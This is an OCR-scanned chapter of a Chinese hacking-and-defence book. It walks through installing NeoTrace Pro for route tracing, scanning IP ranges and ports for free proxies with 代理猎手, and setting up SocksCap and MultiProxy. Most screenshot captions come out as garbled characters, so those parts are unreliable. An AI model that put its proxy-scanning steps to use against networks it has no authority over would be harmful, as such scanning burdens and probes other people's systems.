可 以 阅读 安装 许可 协议 信息 ， 如 下 图 所 示 。 


旨 Uicense Agreement x 


eol ece Goreht T5971998.1593 2000.2007 ~ 
NeoWom Inc. Alights Fieserved. 


ie Tial yerion of NeoT race Prolecsional lis toy 
lfunctional with no disabled or ahered features, but wil 
me da hee Paid 

NFnwnRx INF 

END USER LICENSE AGREEMENT 

NTICE TO USER. TH IS A GONTRAT. FLEASE 


| 
[step 国 认真 阅读 安装 许可 协议 后 ， 单 击 
Next 按钮 ， 即 可 打开 “Choose Destination 
Location (选择 目标 位 置 )” 对 话 框 ， 在 其 
中 根据 需要 选择 需要 安装 的 目标 位 置 ， 如 
下 图 所 示 。 


104 


弦 Cheose Destination Location x 
Setup wil nstall NeoTrace Pro 3.25 Trial in the following folder. 
To nstall nto a dierent folder, chck Browse, and select 

ancther lolder 


‘You can choose not to nstal NeoTrace Pro 325 Tiial by 
chcking Cancel lo exit Selup, 


Destination Folder 
CNPlogam Fies [xa6]\NeoTracePro 


Blowse. 


<Back [CHa Cancel 


在 选择 好 安装 的 目标 位 置 后 ， 单 
击 Next 按钮 ， 即 可 打开 “Select Program 
Manager Group (选择 程序 管理 组 )” 对 话 框 ， 
在 其 中 设置 安装 后 的 名 称 及 启动 位 置 ， 如 
下 图 所 示 。 


沁 Select Program Manager Group x 


name of the Piogram Manager group to add 
Ye 


NeoTrace Po 


本 5 


[Accessbay 
JAccessones 


JAdmenistralive Tools 
Camasis Studio 6 


Mantenance 
Microsoft Olfice 2016 工具 
Microsolt SQL Si 7 


Microso SQL Server Tools 17 
MuRProwy 


ne 
SocksCap 号 
ca cee | 


单 击 Next 按钮 ， 将 打开 “Start In- 
stallation (开始 安装 )” 对 话 框 ， 如 下 图 所 示 。 


济 san Installation x 


You are now ready to nstal NeoTrace Pro 3.25 Trial 
Press the Nex button to begin the installation or the Back 
talabon nfomation. 


[step 图 单 击 Next 按钮 ， 程 序 将 开始 进行 安 
装 并 显示 安装 的 进度 。 安 装 完毕 后 ， 即 可 
弹出 “Installation Complete (安装 完成 )” 
对 话 框 ， 如 下 图 所 示 ， 单 击 “ 完 成 ”按钮 ， 

即 可 完成 整个 安装 过 程 。 


第 7 章 ”黑客 信息 的 追踪 与 代理 服务 器 的 应 用 = 


绚 Installation Complete x 
NeoTiace Pro 3.25 Tiial has been successiuly rtaled 


Press the Firish bulton to exit this nstalation 


| 


2. 使 用 NeoTrace Pro v3. 25 追 踪 信息 

在 完成 整个 安装 过 程 后 ， 下 面 就 可 以 
使 用 NeroTrace Pro 工具 进行 追踪 黑客 信息 
了 。 具 体 的 操作 步骤 如 下 。 
双击 桌面 上 的 NeroTrace Pro 应 用 程 
序 图 标 ， 即 可 进入 其 主 操作 界面 ， 在 目标 
栏 中 输入 想 要 追踪 的 网 址 ， 这 里 输入 www. 
baidu.com， 如 下 图 所 示 。 


转 NecTrace - oO x 


jo。 | 图 wp View | 站 wm 
外 Pig 党 opiom 傅 Onine Hep 


单 击 右 侧 的 Go 按钮 ， 即 可 开始 进入 
追踪 状态 ， 如 下 图 所 示 。 


可 jstop | 国 Mep Yew 


hr | @mimg Mopione Oonine Hep 


step 图 在 扫描 完毕 后 ， 单 击 Map View 右 侧 
的 下 拉 按 钮 ， 在 弹出 的 下 拉 列 表 中 选择 List 
View 选项 ， 如 下 图 所 示 。 


各 NeoTrace wwrbaiducom - 口 x 


-anenn 图 


Fe Ed 


这 样 在 NeroTrace Pro 工作 界面 的 
左 侧 窗 格 中 显示 追踪 的 详细 列表 ， 如 下 图 
所 示 。 


图 NecTrece: wwbaiducom 云 和 
多 Vew Hep 

Tea TT co | Bis Ven 7 [mo rere 
加 Ssve 篇 Copy 画 Pint 日 ping 沉 Opione 图 orineHep 


= phddrese | Name RT (me) | Graph 
0 


PE 


但 
3 zolaln1a7 


Wo var com 
Versn 325- TRAL 上 


[step 图 单 去 Map View 右 侧 的 下 拉 按 钮 ， 在 
弹出 的 下 拉 列 表 中 选择 Node View 选项 ， 
即 可 以 Node View 的 方式 显示 追踪 结果 ， 
如 下 图 所 示 。 

人 - OO x 


wr RE 3] eo 国 Nede Vien » 加 ne pane 


四 se 筷 Copy 画 min 使 fing 党 optione 二 orinel MapVien 
ar A 
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7.2 网络 代理 服务 器 的 应 用 


代理 服务 器 英文 全 称 是 Proxy Server， 
其 功能 是 代理 网 络 用 户 去 取得 网 络 信息 ， 
相当 于 网 络 信息 的 中 转 站 。 使 用 代理 服务 
器 可 以 提高 上 网 速度 、 访 问 一 些 原 本 访问 
不 了 或 访问 速度 极 慢 的 网 站 等 。 


绝招 3: 利用 《代理 猎手 》 查 找 代理 服 


务 器 
《代理 猎手 》 是 一 款 集 搜索 与 验证 于 
一 身 的 软件 ， 可 以 快速 查找 网 络 上 的 免费 
Proxy。 其 主要 特点 是 : 支持 多 网 址 段 、 多 
端口 自动 查询 ; 支持 自动 验证 并 给 出 速度 
评价 等 。 


1. 添加 搜索 任务 

在 利用 《代理 猎手 》 查 找 代理 服务 器 
之 前 ， 还 需要 添加 相应 的 搜索 任务 ， 具 体 
的 操作 步骤 如 下 : 


[es 国 在 启动 《代理 猎手 》 的 过 程 中 , 《 代 
理 猎手 》 还 会 给 出 一 些 警告 信息 ， 如 下 图 
所 示 。 


X 


警告 信息 
请 注意 ， 使 用 本 软件 有 以 下 几 点 需要 明确 : 
生生 件 进行 搜索 时 ， 会 给 网 人 


FE 或 pe 
0 


对 对 
信和 
了 区 使 用 者 自己 承担 - 


厂 以 后 不 再 显示 此 对 话 框 " 


step 国 单 击 “我 知道 了 ， 快 让 我 进去 吧 ! ” 
按钮 ， 即 可 进入 《代理 猎手 》 窗 口 ， 如 下 
图 所 示 。 
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如 f 考 2 x 
NS) 要 雪人 SD 阁 雪 末代 于 有 放 (J| 回 划 具 P】 窗口 W) 大 盈 (H 
paqJjaaglaal 
sd 
和 
= Ex 

| | EE | 

EE Ea NT 


step 图 在 《代理 猎手 》 窗 口中 选择 “搜索 任 


务 ” 一 “添加 任务 ”选项 ， 即 可 打开 “ 添 
加 搜索 任务 ”对 话 框 ， 在 “任务 类 型 ”下 
拉 列 表 框 中 有 “定时 开始 搜索 ”“ 搜 索 完 毕 
关机 ”和 “搜索 网 址 范围 ”3 个 下 拉 列 选项 ， 
这 里 选择 “搜索 网 址 范围 ”选项 ， 如 下 图 
所 示 。 


sy 


ss [EE | 


[ep 加 单 击 “ 下 一 步 ” 按 钮 ， 即 可 进入 “地 
址 范围 ”设置 对 话 框 ， 如 下 图 所 示 。 


res 


RE | pe WP 地 二 


step 较 单 击 “添加 ”按钮 ， 即 可 弹出 “添加 
搜索 卫 范围 ”对 话 框 ， 在 其 中 根据 实际 情 
况 设置 IP 地 址 范围 ， 如 下 图 所 示 。 


添加 搜索 IP 苑 围 x 


地 址 范围 类 型 : | 起 止 地 址 范围 
起 始 地 址 : | 192 .168 . 0 
早 束 地 址 : | 192 .168 . 0 .136| 


I 
Step 图 单 击 “ 确 定 ” 按 钮 ， 即 可 完成 全 地 
址 范围 的 添加 ， 如 下 图 所 示 。 


ED x 


em 
mEexem | ip | EntvUet 
nt 
NE C= |] 
Se 
9 
Ee 
‘Emm | wn | 中 


[sep 图 在 “地 址 范围 ”设置 栏目 中 ， 若 单 击 

“选取 已 定义 的 范围 ”按钮 ， 则 可 弹出 “ 预 

定义 的 他 地 址 范围 ”对 话 框 , 如 下 图 所 示 。 

预定 义 的 IpP 地 址 范围 x 
已 定义 的 IT? 地 址 范围 

铺 束 地 址 备注 添加 


起 始 地 址 


step 较 单 去 “添加 ”按钮 ， 即 可 打开 “添加 
搜索 外 范围 ”对 话 框 ， 如 下 图 所 示 。 


添加 搜索 IP 苑 围 x 
地 址 范围 类 型 : | 起 止 地 址 范围 了 
起 始 地 址 : | 192 .168 . 0 1 
结束 地 址 : | 192 .168 . 0 .136| 
地 址 范围 说 明 : 
| 
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[step 图 在 其 中 根据 实际 情况 设置 了 地 址 范 

围 ， 并 输入 相应 地 址 范围 说 明 后 ， 单 击 “ 确 

定 ” 按 钮 ， 即 可 完成 添加 操作 ， 如 下 图 所 示 。 

预定 义 的 IP 地 址 范围 x 
已 定义 的 IT 地 址 范围 


3 亡 霜 


结束 地 址 
|192. 168.0.136 | | 


起 始 地 址 
192. 168.0.1 


[See 图 如 果 在 “预定 义 的 了 P 地 址 范围 ”对 
话 框 中 单 击 “ 打 开 ” 按 钮 ， 则 可 打开 “ 读 
入 地 址 范围 ”对 话 框 ， 如 下 图 所 示 。 


中 导入 地 址 所 国 x 
醒 撤 气 轩 (): | | iprange 了 ] -外 人 四 " 
各 除 修改 日 基 

122ipr 2019/3/16 18:07 IPR 文 # 
< > 
x#sN): [122 医 二 可 
文件 闪 开 (|p Range Files (ip?) 本 取消 

厂 BR 方式 打开 IR) 


[Sep 图 在 其 中 选择 《代理 猎手 》 已 预 设 了 
地 址 范围 的 文件 ， 并 将 其 读 入 “预定 义 的 
IP 地 址 范围 ”对 话 框 中 ， 在 其 中 选择 需要 
搜索 的 卫 地址 范围 ， 如 下 图 所 示 。 


预定 义 的 |P 地 址 范围 


x 


已 定义 的 IT 地址 范围 
结束 地 址 备注 添加 


起 始 地 址 


step 图 单 去 “使 用 ”按钮 ， 即 可 将 预 设 的 卫 
地 址 范围 添加 到 搜索 卫 地 址 范围 中 ， 如 下 
图 所 示 。 
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x 


sm, 


5 国 单 二 “下 一 步 ”按钮 ， 即 可 打开 “ 端 
口 和 协议 ”对 话 框 ， 如 下 图 所 示 。 


rs 


| 到 | 


[ep 加 单 击 “ 添 加 ”按钮 ， 即 可 打开 “添加 
端口 和 协议 ”对 话 框 ， 在 其 中 根据 实际 情 
况 输入 相应 的 端口 ， 如 下 图 所 示 。 


添加 端口 和 协议 x 
单一 端口 二 取消 


厂 必 扫 
单 击 “ 确 定 ” 按 钮 , 即 可 完成 添加 操作 ， 
单 击 “完成 ”按钮 ， 完 成 搜索 任务 的 设置 ， 
如 下 图 所 示 。 


RE 


条 
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2. 设置 各 项 参数 


在 设置 好 搜索 的 卫 地 址 范围 之 后 ， 就 
可 以 开始 进行 搜索 了 ， 但 为 了 提高 搜索 效 
率 ， 有 必要 先 设置 一 下 《代理 猎手》 的 各 
项 参数 ， 具 体 的 操作 步骤 如 下 。 


[step 图 在 《代理 猎手 》 窗 口中 选择 “ 系 
统 ” 一 “参数 设置 ”选项 ， 即 可 打开 “ 运 
行 参数 设置 ”对 话 框 。 在 “搜索 验证 设 
置 ” 选项 卡 中 ， 可 以 设置 “搜索 设置 ”“ 验 
证 设置 ?2“ 局 域 网 或 拨号 上 网 ”“ 搜 索 方 
法 ”“ 其 他 设置 ”等 选项 ， 这 里 选中 “启用 
先 ping 后 连 的 机 制 ” 复 选 框 ， 以 提高 搜索 
效果 ， 如 下 图 所 示 。 


sa angen| rearon noon 


CCCs 


《代理 猎手 》 默 认 的 搜索 、 验 证 和 
ping 的 并 发 数量 分 别 为 50、80 和 100， 
如 果 用 户 的 带宽 无 法 达到 ， 就 最 好 相应 地 
减少 各 个 并 发 数量 ， 以 减轻 网 络 的 负担 。 


此 外 ， 用户 还 可 以 在 “验证 数据 设置 ” 
选项 卡 中 添加 、 修 改 和 删除 “验证 资源 地 址 ” 
及 其 参数 ， 如 下 图 所 示 。 


res 


is renou | zc 


ass 
see 
seenes: | 
EEC 
a EE on ] 


step 图 在 “代理 调度 设置 ”选项 卡 中 还 可 以 
设置 代理 调度 参数 ， 以 及 代理 调度 范围 等 
选项 ， 如 下 图 所 示 。 


x 
Sree | vase fs | 二 5 | 
人 aes [ao 
Te 7 aerapnier ns 
rns 
1 PA mm em = 
RE | 3 
E33 ws | * 


Estee 加 在 “其 他 设置 ”选项 卡 中 可 以 设置 拨 
号 、 搜 索 验 证 历史 、 运 行 参 数 等 选项 ， 如 


下 图 所 示 。 
imma x 
DE | 
a FER 
mpm Fr mm [5 
| 
RA NT 
ms wut | = 
a | 
EE 
AWindowgs se 
[en 5 SM 
Bnew 厂 二 MeTEES 二 
7 FEE eres 
7 or Sm 
me 
Te 553 习 
这 司 隆 -本 | 吉本 | 


step 园 在 设置 好 《代理 猎手 》 的 各 项 参数 之 
后 , 单 击 “ 确 定 ” 按 钮 , 即 可 返回 《代理 猎手 》 
工作 界面 ， 如 下 图 所 示 。 
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3. 查看 搜索 结果 


搜索 完毕 , 就 可 以 查看 搜索 的 结果 了 ， 
具体 的 操作 步骤 如 下 。 
[seep 国 选择 “搜索 任务 ”一 “开始 搜索 ”选项 ， 
即 可 开始 搜索 设置 的 全 地 址 范围 ， 如 下 图 
所 示 。 


最 fs - 0O x 
于 过 (S| 次 宇和 (1 交 委 结 条 (R| 代理 大 (J) 村 动 T(pP| 窗口 W) 帮助 IH) 


palDaaglaal 


和 家务 | 六 家 纺 蛙 | 代理 涯 度 | 


章 家 任务 


i 
92. 168. 0 1 


人 全 关 数 


mm | mms | mons | 


2168.0.1:.200(HTTR) 全 并 100 个 地 3 六 ,100 个 (5 18:18:58 09% 上 上 07:46:59 |N 18:19:07 


[step 图 选择 “搜索 结果 ”选项 卡 ， 其 中 “ 验 
证 状态 ”为 Free 的 代理 ， 即 为 可 以 使 用 的 
代理 服务 器 ， 如 下 图 所 示 。 


晤 re 3 % 
要 入 (5) 牢 雪 任务 (T 六 过 结果 (R)】 代理 其 庆 (U) 靖 时 内 P) 窗口 MW) 帮 盈 (HH) 


ppQ@DE Ca 


搜索 任务 ”搜索 结果 | 代 玛 调度 | 


时 共 1 个 1 个 被 远 中 ] 
二 同 特 必 


0 11901HTT| 全 并 100 个 并 5 合 ,1005 1818.58 09 [E09:33:50 |N 18.20.34 


侈 提 示 : 一 般 情况 下 ， 验 证 状态 为 Free 的 
代理 服务 器 很 少 ， 但 只 要 验证 状态 为 Good 
就 可 以 使 用 了 。 


同人 时 人 
表 坑 (S) 蔬 索 任务 (站 搜索 结果 (R| _ 代 埋 油 度 (U) 问 姜 工具 (P| 管 口 (W) 者 胎 [H) 
paqnaaaal 
MS [nse | ta | 

位 各 类 里 任务 记 容 | 任 S 数 

ET 修改 等。 | Bees | | 
EE 本 EE 三 i 


[step 图 在 找到 可 用 的 代理 服务 器 之 后 ， 将 其 
IP 地址 复制 到 “代理 调度 ”选项 卡 , 《代理 
猎手 》 就 可 以 自动 为 服务 器 进行 调度 了 ， 
多 增加 几 个 代理 服务 器 有 利于 提高 网 络 
速度 。 
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Pr -3 
5 接任 和 MD 榨 二 条 /RN 代 轨 并 (U) 本 到 后 P 窗口 W】 基色 (1 


[QTB CGIaDD 


| | 


必要 二 列表 
服务 家 地 址 | 甘 口 | 关 瑟 。 | 从 类 赤 。 | 宇 必 | 位 次 | 凌 二 三 


ENR 
E23 RE % 旦 


EE 


192.168.0.1:1300(HTTi| 关 其 100 个 并 发 对 爹 100 人 5 18:16:53 0% 上 093723 |N 18.20:79 


小 技巧 
用 户 也 可 以 将 搜索 到 的 可 用 代理 服 
务 器 四 地 址 和 端口 ， 输 入 到 网 页 浏览 器 
的 代理 服务 器 设置 选项 中 ， 这 样 ， 用 户 就 
可 以 通过 该 代理 服务 器 进行 网 上 冲浪 了 。 


名 绝招 4: 使 用 SocksCap 设 置 动态 代理 


SocksCap 代理 软件 是 NEC 公司 制作 的 
一 款 体积 小 巧 、 功 能 强大 的 网 络 代 理工 具 ， 
使 用 SocksCap 代理 软件 可 以 设置 动态 代理 。 


1. 安装 SocksCap 代 理 软件 


下 载 SocksCap 代理 软件 ， 双 击 其 安 
装 程序 ， 即 可 启动 安装 向 导 ， 如 下 图 所 示 。 


取 去 装 - SocksCap v2.40 充 化 版 


有 全 SocksCap v2. 40 汉化 版 安 


将 在 你 电脑 上 安装 SocksCap v2.40 汉化 版 * 
建议 你 在 继续 之 前 关闭 所 有 其 他 应 用 程序 * 
点 击 “ 继 续 ” 进入 下 一 步 ， 或 点 击 “ 取 消 ” 退出 安装 。 


Ee 图 单 二 “继续 ”按钮 ， 即 可 显示 使 用 该 
软件 时 的 协议 ， 选 中 “我 接受 协议 ” 单 先 
按钮 ， 如 下 图 所 示 。 


取消 


110 


取 安 靳 -SocksCap v2.40 汉化 版 一 x 
许可 协议 
请 在 继续 之 前 阅读 以 下 重要 信息 * 多 
请 河 袜 以 下 许可 协议 。 在 继续 安装 之 前 ， 你 必须 接受 此 协议 的 条 款 。 


| 法 律 条 款 
区 此 汉化 前 ， 请 仔细 的 河 读 下 面 说 明 通 羔 的 法 律 责任 部 分 。 
由 和 请 匆 安 装 此 程序 。 


关于 用 户 界面 汉化 程序 

简体 中 文 版 的 汉化 资源 为 热血 工作 室 所 有 ， 谢 绝 自 改 和 重新 打包 。 目 
件 的 合法 用 户 提供 中 文 界面 ， 而 并 不 修改 软件 原 程序 的 功能 * 
| 全 如， 简体 中 文 界面 汉化 程序 可 能 不 能 支持 下 述 功 能 : 


加 我 接受 协议 (A) 
口 我 不 接受 协议 (7) 


[0 
step 图 单 击 “继续 ”按钮 ， 弹 出 “选择 目标 
位 置 ” 对 话 框 ， 在 其 中 设置 SocksCap 的 安 
装 路 径 ， 如 下 图 所 示 。 


取消 


取 安 柳 - SocksCap v2.40 汉化 版 一 x 
选择 目标 位 置 9 
SocksCap v2. 40 汉化 版 安装 到 哪里 ? 外 


宁可 序 格 把 sockscwp v2. 40 汉化 版 安装 到 以 下 文件 来 中 。 
点 击 “继续 ” 进入 下 一 步 。 如 果 你 要 选择 不 同 的 文件 赤 ， 请 点 击 " 浏 览 " 
E Vpro pe Tiles (00) seqecs v2] EL 


至 少 需 要 1.4 到 的 空间 败 盘 空间 。 


EE 


取消 


[step 园 单 击 “继续 ”按钮 ， 弹 出 “选择 
开始 菜单 文件 夹 ” 对 话 框 ， 在 其 中 设置 
SocksCap 开始 显示 的 菜单 名 称 ， 如 下 图 
所 示 。 


也 去 装 - SocksCap v2.40 汉化 版 一 X 


选择 开始 菜单 文 | 
和 


下 安装 程序 档 在 以 下 开始 荣 单 文件 夫 中 创建 程序 快捷 方式 。 


点 击 “继续 ”进入 下 一 步 。 如 果 你 要 选择 不 同 的 文件 夹 ， 请 点 击 “ 
Eck co) 


浏 ”。 
浏览 (0 


cE ED 


[SG 图 单 去 “继续 ”按钮 ， 弹 出 “选择 附加 
任务 ”对话 框 ， 在 其 中 选中 “创建 桌面 图 标 ” 
复 选 框 ， 如 下 图 所 示 。 
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请 0c "2 40 汉化 期间 记 要 各 作 务 ， 然后 


附加 图 标 : 
回 健 点 面 图 标 (0) 


取 安 装 - SocksCap v2.40 汉化 版 一 入 SocksCap 许可 x 
选择 附加 任务 
要 所 行 哪 3 加 任务 i 


EI EE 


他 Yersion 2.40 (2.40-051231) 


Perneo Technologies，Inc. 由 热血 中 文 网 (wew. rxzw. com 
版 权 所 有 (C) 2007-2010 热血 中 文 网 (ww. rxzw. com) 


a < 
坟 beeen 


A 网 


0 


Step 图 单 击 “ 继 续 ” 按 钮 ， 弹 出 “准备 安装 ” 
对 话 框 ， 在 其 中 可 以 查看 程序 安装 的 设置 
信息 ， 如 下 图 所 示 。 


到 去 装 - SocksCap v2.40 汉化 版 一 X 


准备 安装 
安装 程序 现在 准备 开始 安装 SecksCep v2. 40 汉化 版 * 


点 击 “安装” 继续 安装 ， 如 果 你 想 要 市 坦 职 更 改 设置 请 点 击 “ 近 回 ”。 


pe Files (x66)\SocksCap V2 


开始 各 音 训 件 夹 : 
SooksCap 


附加 任务 
i 蜗 而 图 标 (0) 


取消 


| 


[step 国 单 去 “安装 ”按钮 ， 即 可 开始 安装 ， 
安装 完毕 后 显示 安装 完成 对 话 框 ， 如 下 图 
所 示 。 

中 安装 - SocksCap v2.40 汉化 版 一 

富 丰 SocksCap v2. 40 汉化 版 安装 向 
人 


点 击 “ 完 成 ” 退出 安装 。 
回 运行 SocksCap Y2.40 汉化 版 


ES 


Eee 图 单 击 “ 完 成 ”按钮 即 可 结束 
SocksCap 的 安装 操作 ， 同 时 启动 SocksCap 
程序 。 当 第 一 次 运行 SocksCap 程序 时 ， 显 
示 如 下 图 所 示 的 对 话 框 。 


拒绝 
step 图 单 击 “接受 ”按钮 ,表示 同意 许可 内 容 ， 
这 时 弹出 一 个 信息 提示 框 ， 提 示 用 户 是 否 
现在 修改 SocksCap 的 设置 ， 如 下 图 所 示 。 


SocksCap New Installation / Upgrade 


@ 现在 天 要 修改 SocksCap 的 设置 吗 ? 


step 了 加 单 去 “和 否 ” 按 钮 ， 即 可 进入 SocksCap 
代理 软件 的 工作 界面 ， 如 下 图 所 示 。 


鼻 SocksCap 控制 台 一 口 X 
文件 (月 ”前 看 (V) ”帮助 (H) 


名 [| | 


2. 建立 应 用 程序 标识 


建立 应 用 程序 标识 的 具体 操作 步骤 
如 下 。 
[sep 回 单 去 “新 建 ” 按 钮 ， 即 可 弹出 “新 建 
应 用 程序 标识 项 ”对 话 框 ， 在 “标识 项 名 称 ” 
文本 框 中 输入 新 建 标识 项 的 名 称 ， 如 下 图 
所 示 。 
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新 建 应 用 程序 标识 项 x 
标识 项 名 称 | 
命令 行 : 浏览 @). 
工作 目录 : 
确定 取消 


Ee 国 单 二 “浏览 ”按钮 ， 即 可 在 显示 的 对 
话 框 中 选择 需要 代理 的 应 用 程序 ， 如 下 图 
所 示 。 


@ aut x 
ES | [CT 习 ~ 和 白 他 国 - 

名 称 一 关 至 大 小 

看 :az Em 4 
起 sc32heh 本 后 己 折 5 
取 unins000 应 必得 忆 54 
< > 
IN。 [seazndh 打开 (oO 
文 4 型 0 = 号 


step 国 单 击 “ 打 开 ” 按 钮 ， 即 可 将 所 选 应 用 
程序 的 文件 名 称 和 路 径 信 息 ， 添 加 到 “新 
建 应 用 程序 标识 项 ”对 话 框 中 , 如 下 图 所 示 。 


新 建 应 用 程序 标识 项 x 
标识 项 名 称 [Se32lnch = 一 
命令 行 [C:\Program Files (x86)\Socksc | 浏览 (8). . 


工作 目录 FEroeam Files (Cx66)\Socksc 
确定 取消 
[ep 国 单 南 “确定 ”按钮 ， 则 该 应 用 程序 
标识 项 添加 完毕 ， 添 加 的 应 用 程序 可 以 是 


E-mail 工具 、FTP 工具 、Telnet 工具 以 及 当 
今 最 热门 的 联网 游戏 等 ， 如 下 图 所 示 。 


各 socksCap 控制 台 一 口 x 
文件 (前 看 (V) 帮助 (H) 


号 | 冯 | 吕 | 蝇 | 


3. 设置 SocksCap 选 项 
设置 SocksCap 选项 的 具体 操作 步骤 


2 


如 下 。 

[step 图 选择 “文件 ”一 “设置 ”选项 ， 即 可 
打开 “SocksCap 设置 ”对 话 框 ， 在 “SOCKS 
设置 ”选项 卡 中 可 设置 已 通过 验证 的 代理 
服务 器 及 端口 号 (如 220.48.8.28、 端 口号 
1080) ， 如 下 图 所 示 。 


SecksCap 让 尖 


SocKs 设 本 | 下 法要 | 6 志 | 
Ea 插 定 从 9 5OCKS 服务 露地 址 并 法 控 便 的 各 总 村 记 版 
本 

可 各 

SOCKS 县 咯 [220488.28 英 D: [1080 
Wa 

人 SOCKS 后 本 4(4) 

SCCKS AHR: [Administrator 
个 SOCKS 版 本 5(5) 
a 


(ol 


[CE | 
[step 图 选择 “直接 连接 ”选项 卡 ， 在 其 中 可 
以 添加 直接 连接 的 地 址 、 直 接连 接 的 应 用 
程序 和 库 等 信息 ， 如 下 图 所 示 。 


SocksCap 设置 x 
| 
指定 委 要 直 委 过 控 的 闻 址 他 如 本地 网 中 的 地 址 同时 
轩 

直接 和 连接 的 雹 址 

添 bn. 

出 除 
接连 接 的 应 下 得 和 庄 

濑 Wn- 

ba 

SOCKS 版本 5 下达 去 过 的 UDP 江口 

洗 b0-. 

[二 | 
确 二 训话 应 (A) 


[ep 图 在 “直接 连接 ”选项 卡 的 “直接 连接 
的 地 址 ”选项 区 中 ， 单 击 “ 添 加 ”按钮 ， 
即 可 打开 “添加 直接 目标 文件 ”对 话 框 。 
在 “要 添加 的 目标 文件 ”文本 框 中 添加 要 


连接 的 IP 地址， 如 输入 192.168.0.2。 


添加 直接 目标 文件 x 
要 添加 的 目标 文件 
|192. 168.0.2 
[上 |] my 


[step 贺 在 “直接 连接 的 应 用 程序 和 库 ” 选 项 
区 中 ， 单 击 “ 添 加 ”按钮 ， 在 弹出 的 对 话 
框 中 可 以 输入 需要 直接 连接 的 应 用 程序 
如 下 图 所 示 。 


添加 直接 连接 的 应 用 程序 x 
要 添加 的 应 用 程序 
|c:\gQ. ExE 
|] mw | 


[step 图 在 “SOCKS 版 本 5 直接 连接 的 UDP 
端口 ”选项 区 中 ， 单 击 “ 添 加 ”按钮 ， 在 
弹出 的 对 话 框 中 可 以 设置 直接 连接 的 UDP 
端口 号 ， 如 下 图 所 示 。 

添加 直接 连接 的 UD..。 X 

要 添加 的 端口 

[EE 

取消 


全 部 设置 完成 后 ， 单 击 “ 确 定 ” 按 钮 ， 
即 可 结束 SocksCap 的 选项 设置 , 如 下 图 所 示 。 


SocksCap 设置 x 
SOCKS 设置 ” 直 委 连 接 | E 志 | 
揪 定 雪 要 直接 注 接 的 地 址 nn 本 局 网 中 的 地 址 -同时 
Ce 
直接 连 控 的 地址 ， 
1921580.2 ER 
We 
直入 过 二 应 月 但 订 和 本 
aaee i 
莉 险 
SOCKS 版 本 5 直接 连接 多 UDP 关口 
开除 
| 
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[step 国 设置 好 代理 选项 并 添加 好 需要 代理 的 
应 用 程序 后 ， 在 应 用 程序 列表 中 选取 需要 
运行 的 应 用 程序 ， 选 择 “ 文 件 ” 一 “通过 
Socks 代理 运行 ”选项 ， 如 下 图 所 示 ， 即 可 
启动 该 应 用 程序 并 通过 代理 进行 登录 。 
届 sodksCap 控制 台 - OO x 
文件 (月 ”可 看 (V) 帮助 (H) 
新 建 (N)-. 


删除 (D) 
修改 (M)… 


设置 (9)… 
导出 设置 (E).. 
导入 设置 ().… 


用 户 名 /密码 (U).… 
退出 0 


侈 提示 : 如 果 需 要 使 某 个 应 用 程序 通过 
SocksCap 代 理 , 则 须 通 过 SocksCap 进 行 启动 。 


绝招 5: 使 用 MultiProxy 自 动 设置 代理 


MultiProxy 是 一 款 非常 实用 的 自动 代 
理 调度 的 代理 软件 ， 用 户 只 需 在 MultiProxy 
下 配置 已 经 通过 验证 的 代理 ， 再 定义 好 其 
他 需要 通过 代理 调度 的 软件 并 指向 Multi- 
Proxy， 更 换代 理 时 只 需 在 MultiProxy 中 进 
行 变更 ， 而 不 用 一 个 个 地 去 进行 更 换 ， 具 
体 的 操作 步骤 如 下 。 
用 户 可 从 Intemet 网 上 下 载 最 新 版 本 ， 
若是 压缩 文件 ， 则 需要 使 用 WinRAR 或 
WinZip 等 专用 解压 缩 工具 将 其 解压 ， 运 行 
即 可 进入 操作 界面 ， 如 下 图 所 示 。 


其 Mukiproxo v1.2a 一 
Fle Proxy list Help 


x 


Comneotion status: 


Step 图 单 击 “选项 ”按钮 ， 即 可 打开 “选项 ” 
对 话 框 ， 在 “常规 选择 ”选项 卡 中 可 以 设 
置 连接 的 端口 号 、 连 接 的 线程 数量 、 连 接 
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代理 服务 器 的 方式 、 选 择 服 务 器 、 是 否 测 
试 服务 器 等 选项 ， 如 下 图 所 示 。 
Gereral optons | pro sorvers st | Aivaneed opsons | 


FD Tot all severs on start up 


(Auto-sort prony Fst by spee 
Maintain fixed proxy/ip per web-st 


Call responding prosy server 


Test anonymiy via 
人 Comed back to my computer to port [oa 


6 Domt check for anonymity Hl 


[step 图 在 “代理 服务 器 列表 ”选项 卡 中 ， 可 
以 查看 代理 服务 器 的 连接 状态 、 添 加 、 编 辑 、 
删除 代理 服务 器 等 操作 ， 如 下 图 所 示 。 


pions x 


General options Proxy carvers lict | Advenced options | 


Paddress i 
caches 到 


0 1 20047 0 
80 103224162245 。 468 0 
a0 lyeache, 90990 0 
50 1921384091 20047 o 
0 mastermenste.. 35999 0 
80 2093244225 20047 0 


Dr | 
| 


step 国 在 “高 级 选项 ”选项 卡 中 ， 可 以 设置 
是 否 保存 日 志文 件 、 空 闲 挂 线 时 间 、 仅 允 
许 连 接 的 瑟 地 址 等 选项 ， 如 下 图 所 示 。 


areed ortors | 


5 


厂 ouerrideleealP 


厂 override lecal host 


Allow connectons frcm the following IP addresses cnly 
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[step 图 设置 完毕 ， 单 击 “ 确 定 ” 按 钮 ， 即 可 
将 自己 的 设置 保存 到 系统 中 。 在 “Internet 
属性 ”对 话 框 中 选择 “连接 ”选项 卡 ， 如 
下 图 所 示 。 


全 Imtemce FE ? x 
守 珊 实 全 风 队 内 窑 到 扩 全 序 高 和 
@ wearer sas, 
anarrammaas 
下 
Ee 
re a 
amuamas 
Un sgranmausea wus, sa RR 
en 
天 十 最 商 BA 


step 图 单 击 “ 局 域 网 设置 ”按钮 , 即 可 打开 “局 
域 网 (LAN) 设置 ”对 话 框 ， 在 其 中 设置 
代理 服务 器 时 输入 的 数据 ， 如 下 图 所 示 。 


Sa 
下痢 全 要 要 于 埃 设 吐 ， 关 克 保 重 让 于 寺 双 着 ， 清 权 用 动 本 省， 


Dmtearesa) 
Demenmases) 


同 为 LAN 使 有 ft 汉 职 务 关 (六 学 由 不 用 于 接续 或 VFN 连 扩 00 


OM 8080 IO 


加 区 于 二 ost 不 全 人 (再 服务 中 ) 
[Ec 


运行 指定 MultiProxy 代理 的 网 络 应 
用 程序 时 ， 在 MultiProxy 界面 中 可 以 清楚 
地 看 到 正在 被 调用 的 代理 服务 器 ， 如 下 图 
所 示 。 


其 Multiproxy v12a 一 x 
File Proxy list Help 


(E12700.1 


Connection statas: 


tasting renote proxies (2/9) 


Configure vour browser to connect vis 127.0.0.1 Close 


7.3 ”实战 演练 
时 实战 演练 1 一 获取 网 络 代理 服务 器 


: 代理 服务 器 是 介 于 浏览 器 和 Web 服务 

